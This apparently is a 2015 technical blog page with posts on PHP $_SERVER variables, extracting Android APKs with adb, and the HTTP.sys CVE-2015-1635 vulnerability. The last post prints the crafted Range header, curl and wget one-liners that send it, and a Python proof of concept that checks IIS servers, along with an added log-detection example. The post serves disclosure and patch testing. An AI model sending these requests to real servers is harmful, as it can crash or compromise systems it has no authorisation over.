5/31/2015

Getting server and web address information with PHP $_SERVER

1. Getting web address information using $_SERVER


<?php

$hostname  = $_SERVER["SERVER_NAME"];   // server name, e.g. www.codebalck.net
$hostname2 = $_SERVER["HTTP_HOST"];     // Host: header, e.g. www.codebalck.net
$uri       = $_SERVER["REQUEST_URI"];   // request URI, e.g. /2015/05/php-sever.html

?>

2. Main $_SERVER elements


'GATEWAY_INTERFACE'
    What revision of the CGI specification the server is using; i.e. 'CGI/1.1'.
'SERVER_ADDR'
    The IP address of the server under which the current script is executing.
'SERVER_NAME'
    The name of the server host under which the current script is executing. If the script is running on a virtual host, this will be the value defined for that virtual host.
'SERVER_SOFTWARE'
    Server identification string, given in the headers when responding to requests.
'SERVER_PROTOCOL'
    Name and revision of the information protocol via which the page was requested; i.e. 'HTTP/1.0'.
'REQUEST_METHOD'
    Which request method was used to access the page; i.e. 'GET', 'HEAD', 'POST', 'PUT'.
'REQUEST_TIME'
    The timestamp of the start of the request. Available since PHP 5.1.0.
'REQUEST_TIME_FLOAT'
    The timestamp of the start of the request, with microsecond precision. Available since PHP 5.4.0.
'QUERY_STRING'
    The query string, if any, via which the page was accessed.
'DOCUMENT_ROOT'
    The document root directory under which the current script is executing, as defined in the server's configuration file.
'HTTP_ACCEPT'
    Contents of the Accept: header from the current request, if there is one.
'HTTP_ACCEPT_CHARSET'
    Contents of the Accept-Charset: header from the current request, if there is one. Example: 'iso-8859-1,*,utf-8'.
'HTTP_ACCEPT_ENCODING'
    Contents of the Accept-Encoding: header from the current request, if there is one. Example: 'gzip'.
'HTTP_ACCEPT_LANGUAGE'
    Contents of the Accept-Language: header from the current request, if there is one. Example: 'en'.
'HTTP_CONNECTION'
    Contents of the Connection: header from the current request, if there is one. Example: 'Keep-Alive'.
'HTTP_HOST'
    Contents of the Host: header from the current request, if there is one.
'HTTP_REFERER'
    The address of the page (if any) which referred the user agent to the current page. This is set by the user agent. Not all user agents will set this, and some provide the ability to modify HTTP_REFERER as a feature. In short, it cannot really be trusted.
'HTTP_USER_AGENT'
    Contents of the User-Agent: header from the current request, if there is one. This is a string denoting the user agent which is accessing the page. A typical example is: Mozilla/4.5 [en] (X11; U; Linux 2.2.9 i586). Among other things, you can use this value with get_browser() to tailor your page's output to the capabilities of the user agent.
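Most of the keys above are CGI meta-variables and reach a Python CGI/WSGI handler under the same names, so the same caution applies there. The following is an added example (not from the original post, and written in Python rather than PHP) that builds the page URL from these values while treating HTTP_HOST, REQUEST_URI and HTTP_REFERER as client-controlled; ALLOWED_HOSTS and SAMPLE_ENV are assumed and constructed values.

```python
import re

# Added example, not from the original post: most $_SERVER keys above are CGI meta-variables
# and reach a Python CGI/WSGI handler under the same names, so the same caution applies there.
# ALLOWED_HOSTS is an assumed value; list the hostnames the site actually serves.
ALLOWED_HOSTS = {"www.codebalck.net", "codebalck.net"}

def trusted_host(environ, allowed=ALLOWED_HOSTS):
    """HTTP_HOST is the raw Host: header, chosen by the client, and SERVER_NAME can be derived
    from it unless the web server pins a canonical name, so neither is accepted unverified."""
    raw = environ.get("HTTP_HOST", "").strip().lower()
    host = re.sub(r":\d+$", "", raw)            # ignore an explicit port for the comparison
    if host not in allowed:
        raise ValueError("unexpected Host header: %r" % raw)
    return raw

def current_url(environ, allowed=ALLOWED_HOSTS):
    """Absolute URL of the current request, built only from checked values."""
    host = trusted_host(environ, allowed)
    scheme = "https" if environ.get("HTTPS", "off").lower() not in ("", "off") else "http"
    # REQUEST_URI is client-controlled as well: accept only a plain absolute path.
    path = environ.get("REQUEST_URI", "/").split("?", 1)[0]
    if not path.startswith("/") or "//" in path or ".." in path.split("/"):
        raise ValueError("unexpected REQUEST_URI: %r" % environ.get("REQUEST_URI"))
    query = environ.get("QUERY_STRING", "")
    return "%s://%s%s%s" % (scheme, host, path, "?" + query if query else "")

def referer_is_same_site(environ, allowed=ALLOWED_HOSTS):
    """HTTP_REFERER is set, omitted or rewritten by the user agent (see above), so it is only
    a hint for logging or soft checks, never an authorisation decision. None = absent."""
    ref = environ.get("HTTP_REFERER")
    if not ref:
        return None
    m = re.match(r"^https?://([^/:?#]+)", ref, re.IGNORECASE)
    return bool(m) and m.group(1).lower() in allowed

# Constructed request, matching the example values shown in section 1
SAMPLE_ENV = {
    "SERVER_NAME": "www.codebalck.net",
    "HTTP_HOST": "www.codebalck.net",
    "REQUEST_URI": "/2015/05/php-sever.html",
    "QUERY_STRING": "",
    "HTTPS": "off",
    "HTTP_REFERER": "http://www.codebalck.net/2015/05/",
}
```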



5/27/2015

Extract .apk (Android app) files from installed apps

Extracting apk files with adb

The package path can be found with the pm command inside adb shell.
Once the path is known, use adb pull to retrieve the apk file.

Check the installed package path (find path)

# pm list packages -f
# pm list packages -f | grep camera                    
package:/system/app/FactoryCamera_FB/FactoryCamera_FB.apk=com.sec.factory.camera
package:/system/app/SamsungCamera3/SamsungCamera3.apk=com.sec.android.app.camera

.apk file extraction (extract apk file)

# adb pull /<path>
# adb pull /system/app/SamsungCamera3/SamsungCamera3.apk
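The two steps above (resolve the path from the pm listing, then pull) as an added example, not part of the original post: it parses the "package:<apk path>=<package name>" line format shown in the listing and pulls the APK for one exact package name through adb. SAMPLE_PM_OUTPUT is constructed, and adb is only invoked by pull_apk.

```python
import re
import subprocess

# Added example, not from the original post: parse the "package:<apk path>=<package name>"
# lines printed by "pm list packages -f" (see the listing above) and pull the APK for one
# exact package name through adb. SAMPLE_PM_OUTPUT is constructed; adb is only run by pull_apk.
PM_LINE = re.compile(r"^package:(?P<path>.+)=(?P<pkg>[^=\s]+)$")

# Same shape as the listing in the post (adb shell output often carries \r line endings).
SAMPLE_PM_OUTPUT = (
    "package:/system/app/FactoryCamera_FB/FactoryCamera_FB.apk=com.sec.factory.camera\r\n"
    "package:/system/app/SamsungCamera3/SamsungCamera3.apk=com.sec.android.app.camera\r\n"
)

def parse_pm_list(output):
    """Map package name -> APK path. The greedy path group makes the split happen at the
    last '=', so a path that itself contains '=' is still parsed correctly."""
    packages = {}
    for line in output.splitlines():
        m = PM_LINE.match(line.strip())
        if m:
            packages[m.group("pkg")] = m.group("path")
    return packages

def apk_path(output, package):
    """Exact-name lookup; the 'grep camera' in the post is a substring match and can hit more."""
    return parse_pm_list(output).get(package)

def pull_apk(package, dest=".", runner=subprocess.run):
    """Ask the attached device for its package list, then pull the APK for `package`.
    `runner` is injected so the logic can be exercised without a device."""
    listing = runner(["adb", "shell", "pm", "list", "packages", "-f"],
                     capture_output=True, text=True, check=True).stdout
    path = apk_path(listing, package)
    if path is None:
        raise LookupError("package %s is not installed" % package)
    runner(["adb", "pull", path, dest], check=True)
    return path
```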

Usage

 usage: pm list packages [-f] [-d] [-e] [-s] [-3] [-i] [-u] [FILTER]
       pm list permission-groups
       pm list permissions [-g] [-f] [-d] [-u] [GROUP]
       pm list instrumentation [-f] [TARGET-PACKAGE]
       pm list features
       pm list libraries
       pm path PACKAGE
       pm install [-l] [-r] [-t] [-i INSTALLER_PACKAGE_NAME] [-s] [-f]
                  [--algo <algorithm name> --key <key-in-hex> --iv <IV-in-hex>] PATH

       pm uninstall [-k] PACKAGE
       pm clear PACKAGE
       pm enable PACKAGE_OR_COMPONENT
       pm disable PACKAGE_OR_COMPONENT
       pm disable-user PACKAGE_OR_COMPONENT
       pm grant PACKAGE PERMISSION
       pm revoke PACKAGE PERMISSION
       pm set-install-location [0/auto] [1/internal] [2/external]
       pm get-install-location
       pm set-permission-enforced PERMISSION [true|false]

5/13/2015

HTTP.sys Remote Code Exploit (CVE-2015-1635/MS15-034) vulnerability

Among the MS security patches that were in the news recently was the HTTP.sys Remote Code Exploit (CVE-2015-1635/MS15-034).
It is a vulnerability in which an attacker manipulates an HTTP header to cause a fault on a vulnerable system; it affects IIS, the Windows-family web server, and appears to have drawn a fair amount of attention.

HTTP.sys is the kernel-mode driver that handles HTTP requests; an integer overflow in it makes remote code execution or a blue screen possible.

CVSS score (version 2.0)

CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

Vulnerable versions

+ Configuration 1
+ OR
* cpe:/o:microsoft:windows_7::sp1:x64
* cpe:/o:microsoft:windows_7::sp1:x86
* cpe:/o:microsoft:windows_server_2008:r2:sp1
* cpe:/o:microsoft:windows_8:-::~~~~x64~
* cpe:/o:microsoft:windows_8:-::~~~~x86~
* cpe:/o:microsoft:windows_8.1:-:-:~-~-~-~x64~
* cpe:/o:microsoft:windows_8.1:-:-:~-~-~-~x86~
* cpe:/o:microsoft:windows_server_2012:-:gold
* cpe:/o:microsoft:windows_server_2012:r2:-:~-~datacenter~~~
* cpe:/o:microsoft:windows_server_2012:r2:-:~-~essentials~~~
* cpe:/o:microsoft:windows_server_2012:r2:-:~-~standard~~~

Vulnerability


GET / HTTP/1.1
Host: vuln host
Range: bytes=0-18446744073709551615

Sending a numeric Range value like the one above with a web request triggers an overflow in UlAdjustRangesToContentSize; once it overflows, the length check performed in UlAdjustRangesToContentSize can be bypassed.

Because the attack is simple, it can be tested with a short script or with tools such as curl and wget.
curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/

Python PoC (http://pastebin.com/ypURDPc4)
-----
import socket
import random

ipAddr = ""
hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
    print "[*] Not IIS"
    exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
    print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
    print "[*] Looks Patched"
else:
    print "[*] Unexpected response, cannot discern patch status"
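From the defender's side, the request above is easy to spot in logs: the Range bound is far beyond any content length. The following is an added example (not part of the original post or of the PoC above) that parses Range headers out of request log lines and flags implausible offsets; the log layout, the MAX_PLAUSIBLE_OFFSET limit and SAMPLE_LOG are assumptions and constructed values.

```python
import re

# Added example, not from the original post: a defender-side check that parses the HTTP Range
# header and flags requests whose byte offsets are implausibly large, such as the
# bytes=0-18446744073709551615 value shown above. The limit and the log format are assumptions.
RANGE_SPEC = re.compile(r"^\s*bytes\s*=\s*(.+?)\s*$", re.IGNORECASE)
MAX_PLAUSIBLE_OFFSET = 2 ** 32 - 1   # assumption: tune to the largest file the server serves
LOG_RANGE = re.compile(r'"Range:\s*([^"]*)"')   # constructed log layout, see SAMPLE_LOG

def parse_ranges(header_value):
    """Return [(first, last), ...] with None for an omitted bound; ValueError if malformed."""
    m = RANGE_SPEC.match(header_value)
    if not m:
        raise ValueError("not a byte-range header: %r" % header_value)
    ranges = []
    for part in m.group(1).split(","):
        first, sep, last = part.strip().partition("-")
        if not sep or (first == "" and last == ""):
            raise ValueError("malformed range: %r" % part)
        for bound in (first, last):
            if bound and not bound.isdecimal():
                raise ValueError("non-numeric bound: %r" % part)
        ranges.append((int(first) if first else None, int(last) if last else None))
    return ranges

def is_suspicious_range(header_value, limit=MAX_PLAUSIBLE_OFFSET):
    """True when any bound exceeds the limit, or when the header cannot be parsed at all
    (the wget form above, which omits 'bytes=', lands here too)."""
    try:
        ranges = parse_ranges(header_value)
    except ValueError:
        return True
    return any(b is not None and b > limit for pair in ranges for b in pair)

def flag_requests(log_lines):
    """Return the log lines whose Range header is suspicious."""
    flagged = []
    for line in log_lines:
        m = LOG_RANGE.search(line)
        if m and is_suspicious_range(m.group(1)):
            flagged.append(line)
    return flagged

SAMPLE_LOG = [   # constructed sample lines, not real traffic
    '10.0.0.5 GET /index.html "Range: bytes=0-1023"',
    '10.0.0.9 GET / "Range: bytes=0-18446744073709551615"',
    '10.0.0.7 GET /video.mp4 "Range: bytes=500-999,1000-1499"',
    '10.0.0.8 GET / "Range: 0-18446744073709551615"',
]
```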
